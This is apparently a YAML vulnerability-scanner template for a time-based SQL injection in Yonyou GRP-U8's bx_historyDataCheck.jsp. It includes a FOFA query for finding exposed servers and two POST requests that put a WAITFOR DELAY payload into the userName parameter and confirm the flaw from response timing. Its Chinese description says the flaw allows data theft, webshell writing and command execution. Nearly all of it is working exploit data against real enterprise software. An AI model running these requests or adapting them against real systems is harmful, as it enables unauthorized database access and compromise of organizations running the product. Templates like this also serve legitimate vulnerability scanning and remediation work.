product: 用友GRP-U8
vName: 用友GRP-U8 bx_historyDataCheck.jsp SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: 用友GRP-U8 bx_historyDataCheck.jsp存在sql注入，攻击者可利用该漏洞执行任意SQL语句，如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。
version: ''
note: ''
search:
  FOFA: app="用友-GRP-U8"
protocol: http
link: https://www.cnblogs.com/pursue-security/p/17795377.html
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /u8qx/bx_historyDataCheck.jsp
      data: userName='%3bWAITFOR+DELAY+'0%3a0%3a5'--%26ysnd%3d%26historyFlag%3d
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          time:
            check: '>='
            num: 5
  - exp:
      method: post
      follow: false
      path: /u8qx/bx_historyDataCheck.jsp
      data: userName='%3bWAITFOR+DELAY+'0%3a0%3a0'--%26ysnd%3d%26historyFlag%3d
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          time:
            check: <=
            num: 3